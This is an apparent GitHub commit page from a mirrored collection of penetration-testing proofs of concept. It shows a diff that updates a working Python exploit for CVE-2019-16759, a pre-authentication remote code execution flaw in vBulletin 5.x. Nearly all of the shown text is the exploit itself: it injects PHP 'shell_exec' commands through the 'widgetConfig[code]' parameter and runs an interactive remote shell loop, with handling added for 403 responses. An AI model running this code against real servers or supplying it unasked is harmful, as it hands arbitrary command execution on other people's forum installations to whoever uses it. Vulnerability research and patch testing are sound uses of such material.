admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-21 18:30:39 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md

Browse Source 
fix when status code was 403
This commit is contained in:
东方有鱼名为咸 2019-09-26 20:03:06 +08:00 committed by GitHub
parent 43e577f84e
commit 1d539ee2b7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md
View File

@ -45,21 +45,26 @@ import sys
if len(sys.argv) != 2: if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0]) sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
proxies ={
"http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"} params = {"routestring":"ajax/render/widget_php"}
while True: while True:
try: try:
cmd = raw_input("vBulletin$ ") cmd = raw_input(">>>Shell= ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;" params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
r = requests.post(url = sys.argv[1], data = params) r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
if r.status_code == 200: if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
print r.text print
print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
else: else:
sys.exit("Exploit failed! :(") sys.exit("Exploit failed! :(")
except KeyboardInterrupt: except KeyboardInterrupt:
sys.exit("\nClosing shell...") sys.exit("\nClosing shell...")
except Exception, e: except Exception, e:
sys.exit(str(e)) sys.exit(str(e))
``` ```
### 复现截图 ### 复现截图